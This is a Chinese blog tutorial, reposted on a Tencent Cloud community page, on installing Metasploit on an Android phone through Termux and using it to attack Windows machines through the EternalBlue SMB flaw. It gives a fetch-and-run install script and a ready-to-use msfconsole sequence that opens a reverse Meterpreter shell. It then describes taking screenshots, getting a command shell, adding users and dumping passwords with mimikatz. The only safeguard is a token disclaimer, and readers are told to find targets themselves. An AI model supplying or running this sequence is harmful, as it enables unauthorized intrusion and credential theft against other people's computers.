专栏首页网络攻防实战知识交流在安卓系统安装运行Metasploit并对windows进行永恒之蓝攻击

在安卓系统安装运行Metasploit并对windows进行永恒之蓝攻击

注意!!!请勿用于非法用途!发生任何事都与本人无关不负任何责任!!!

简介

Metasploit是一款强大的渗透测试平台,其中包括了很多渗透测试利器,简称MSF。今天我就演示如何在手机上运行Metasploit并且实现"永恒之蓝"渗透内网windows主机!由于安卓平台的特殊性,要在Termux上部署MSF!

重要提醒

强烈建议用联通4g网络安装MSF,安装出错90%都是由于网络问题导致的!!!

步骤

点击下载并安装Termux.apk,第一次启动会下载系统,加载速度由网络决定。(如果不翻蔷下载会很慢很慢)

执行apt update && apt upgrade命令,Termux将会更新软件源并升级软件包。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)

执行apt install curl proot命令,Termux将会安装curl。(遇到Do you want to continue? [Y/n]之类的提示就输入Y回车即可)

执行

curl -L https://Auxilus.github.io/metasploit.sh > metasploit.sh

命令,Termux将会下载MSF安装脚本。

执行

chmod +x metasploit.sh && ./metasploit.sh

命令,Termux将会自动安装MSF。(在此过程中会提示安装多个软件包,输入y回车即可,请耐心等待!我安装的时候整整花了半个小时!)

以上所有步骤完成之后,执行msfconsole命令即可启动metasploit神器!(启动速度有点慢,一般不会超过3分钟)——启动界面如下图:

实战演练

到这里Metasploit的安装就完成了!下面我演示一下攻击windows的"永恒之蓝"漏洞:

第一步,首先要找到一个开着445端口的靶机的ip,你可以用nmap扫描网段,也可以自己找,找ip的方法靠自己。这里我就示范一下攻击10.1.100.181这台windows,先启动msf,然后执行下面的命令:

use exploit/windows/smb/ms17_010_eternalblue

set rhost 10.1.100.181

set payload windows/x64/meterpreter/reverse_tcp

set lhost 10.13.175.191

set lport 5555

exploit

解释一下语句的作用

use exploit/windows/smb/ms17_010_eternalblue

就是使用ms17_010_eternalblue永恒之蓝模块

set rhost 10.1.100.181

就是设置靶机ip地址

set lhost 10.13.175.191

就是设置本机ip地址,你需要使用就修改两个ip地址就行了,其它不用修改。——入侵成功如下图:

现在这台windows就相当于被我拿下了,这时候执行screenshot可以获得该电脑的截图,执行shell可以在该电脑运行cmd命令,并可以添加用户,执行load mimikatz加载密码模块,使用命令wdigest获取电脑的账户密码,还有开启远程端口直接用自己的电脑控制那台windows等等等等,此处省略一万字。这里我就拿永恒之蓝作为例子,更多技术你们自己去谷歌学习吧!

本文分享自微信公众号 - 无级安全(wujisec),作者:ฅ 烟 雨 吖!

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-10-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 靶机实战 |『VulnHub系列』Bottleneck 1-Walkthrough

    发现这个img标签的src的值有点特别,对其进行base64解码,得到图片名称bottleneck_dontbe.png

    用户5878089
  • phpstudy RCE 复现

    用户5878089
  • nuca_web_blog

    今天晚上才知道有nuca的比赛,找到一个账号随便看了几眼,看了一个blog题目,在此记录一下。最后思路清晰了,可是结束之前没有做出来,感觉自己真的是老了,打不动...

    用户5878089
  • GSEA结果解读

    ES是GSEA最初的结果,反应全部杂交data排序后,在此序列top或bottom富集的程度。 ES原理:扫描排序序列,当出现一个功能集中的gene时,增加E...

    Y大宽
  • WGCNA的理论背景知识

    WGCNA是一种从大量数据中挖掘module的算法,而这些module所包含的gene为一组表达模式类似或这说表达谱相似的基因,也就是相关或不相关。 而正相关...

    Y大宽
  • Groovy-3.流程控制

    悠扬前奏
  • RabbitMQ如何保证消息99.99%被发送成功?

    要想保证消息不丢失,首先我们得保证生产者能成功的将消息发送到RabbitMQ服务器。

    Java_老男孩
  • 看过 CVPR 2018 workshop 后,发现有一个我不认识的 Lady Gaga

    当地时间 6.18-22 日,CVPR 2018 将在美国盐湖城举办。目前距离大会开幕还有四个月,随着春节期间大会主办方公布接收论文名单,引来大家对 CVPR ...

    AI研习社
  • 如何通过XSS入侵网络摄像头

    我们在ANNKE SP1 HD无线摄像头(固件版本v3.4.1.1604071109)中发现了一个风险较低但十分有趣的XSS。有趣的是,在Annke Web界面...

    ittongluren
  • 数据分析图的十大错误,你占了几个?

    本文转载自大数据 "数据可视化"是个好帮手,可以帮助用户理解数据。但是,你真的会用它吗?看看这里,数据可视化的十大错误你占了几个? 优秀的数据可视化依赖优异的设...

    iCDO互联网数据官

扫码关注云+社区

领取腾讯云代金券

玩转腾讯云 有奖征文活动